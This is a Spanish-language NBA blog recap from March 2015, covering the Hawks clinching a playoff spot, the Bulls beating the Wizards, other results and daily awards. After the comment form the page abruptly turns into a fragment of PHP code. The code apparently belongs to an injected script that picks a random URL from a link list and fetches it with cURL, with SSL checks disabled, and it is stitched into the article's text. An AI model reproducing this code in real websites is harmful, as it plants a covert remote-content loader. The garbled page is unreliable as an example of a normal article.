La Crónica: Los Hawks (ya) son de Playoffs

04 de March de 2015 por txusma

Requirió de una victoria mucho más sufrida de lo previsto pero los Hawks sellaron (¡a 3 de marzo!) su billete para los Playoffs 2015. El impresionante balance de Atlanta, con un 80% de victorias, contrasta ahora mismo con la caída libre que sufren los Wizards, derrotados en Chicago por un excelente Mirotic. El debut triunfal de los Nuggets post-Shaw, una nueva exhibición de los Cavs y otro ridículo de los Knicks son algunas de las cosas que os contamos a continuación.

teague

Houston Rockets 96 – Atlanta Hawks 104

Los Rockets visitaban al equipo que la clasificación señala como el mejor de la liga, y lo hacían sin James Harden, sancionado por su coz a LeBron, ni Dwight Howard, cada vez más dado a pasar sus días en la enfermería que en la pista. Sobre el papel, una víctima propicia, pues, para los temibles Hawks. La realidad distó mucho de nuestras lógicas previsiones, porque los Rockets salieron a comerse el Philips Arena y por poco no salen victoriosos de una cancha que únicamente ha visto cuatro victorias visitantes en lo que va de curso. Los Hawks se llegaron a ver 18 puntos por debajo de unos Rockets desacomplejados, tal vez extra motivados para regalar a Josh Smith un triunfo ante los silbidos con los que fue recibido en la que fuera su casa, y con Jason Terry supliendo a Harden en la medida de sus posibilidades. Pero si algo le sobra a Atlanta este año es confianza en sí mismo, y así, sin variar una coma del guion recitado por Budenholzer, la desventaja fue menguando hasta que un triple de Teague dio la vuelta al marcador con más de 4 minutos aún por jugarse. Se impuso entonces la lógica y los Hawks se aseguran ya una plaza en Playoffs.

Washington Wizards 92 – Chicago Bulls 97

Los Wizards han pasado de aspirantes al primer puesto del Este a ser uno de los peores equipos de la liga en el último mes y medio de competición. Su visita a Chicago, donde esperaban unos Bulls sin Rose ni Butler, confirmó la tendencia negativa de los capitalinos. La efectividad de Pau Gasol, la labor de Noah en todos los aspectos del juego y la irrupción de Mirotic fueron suficientes argumentos para tumbar a los Wizards, que se mantuvieron siempre en el partido de la mano de John Wall pero que volvieron a mostrar grandes carencias en el tiro (aspecto en el que la baja forma de Beal les hace resentirse especialmente). Con esta victoria, los Bulls mantienen el paso de Raptors y Cavs, mientras que los Wizards se descuelgan tal vez de manera definitiva y empiezan a olvidarse de disfrutar de ventaja de campo en primera ronda.

Resto de la jornada

Afortunadamente para los Wizards, los Bucks sumaron su tercera derrota seguida. Fue en Denver, donde Melvin Hunt se estrenó como head coach en sustitución del despedido Shaw y lo hizo con éxito (95-106). Los Cavs retomaron el camino de la victoria y volvieron a mostrarse como un equipo temible para arrasar a los Celtics (79-110). Es la segunda derrota seguida de Boston, lo que le aleja de una octava plaza más en el aire que nunca. Los Hornets siguen en la pomada tras ganar con sufrimiento a los Lakers (103-104). Sí hubo sorpresa en Memphis, donde Rudy Gobert aprovechó la ausencia de Zach Randolph para imponer su voluntad en ambas zonas con 15 puntos y 24 rebotes en el triunfo de los Jazz (93-82). El nuevo esperpento protagonizado por los Knicks en el Madison, esta vez en forma de paliza frente a los Kings (124-86), cierra el repaso a la jornada.

PREMIOS

MVP: Con los 27 puntos de ayer, LeBron James superó a Ray Allen en la lista de máximos anotadores de la historia y se queda a las puertas del TOP-20. Para completar la actuación, 5 asistencias, 3 rebotes y 3 robos, todo ello en sólo 26 minutos.

Rookie: Desde que Byron Scott “liberó” a Jordan Clarkson, el rookie de los Lakers mejora día a día. Ayer anotó 19 puntos y repartió 4 asistencias sin perder un solo balón. Otros rookies destacados destacados fueron Rodney Hood y Jordan Adams, ambos con 13 puntos. Pero ninguno como Nikola Mirotic, autor de 23 puntos y 8 rebotes fundamentales en la victoria de los Bulls.

Sorpresa: Contentos de observar cómo Danilo Gallinari no ha perdido del todo el toque que tenía antes de su grave lesión de hacer un par de temporada. Ayer anotó 26 puntos y capturó 7 rebotes. Y en los Rockets, sin Harden en pista, Jason Terry se creció para anotar 21 puntos.

Decepción:0 puntos, 0 rebotes, 0 asistencias, 3 pérdidas. Son los números de Zaza Pachulia en 13 minutos de juego. Parecido rendimiento ofreció Nene Hilario, 0 puntos y 6 rebotes después de declarar su “odio” por los Bulls. Por su parte, Trey Burke falló 9 de sus 11 lanzamientos a canasta y se quedó en 4 puntos.

Esfuerzo en vano: 23 puntos, 6 rebotes, 8 asistencias, 2 robos y 1 tapón. Aunque algunos no se acuerden, Jeremy Lin es capaz todavía de marcarse un partido parecido a aquellos de la “Linsanity”. Y por bien poco los Lakers no se llevaron la victoria de Charlotte.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. jhc dice:
    #1

    Ya somos equipos de play-offs ahora a conseguir ese primer puesto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>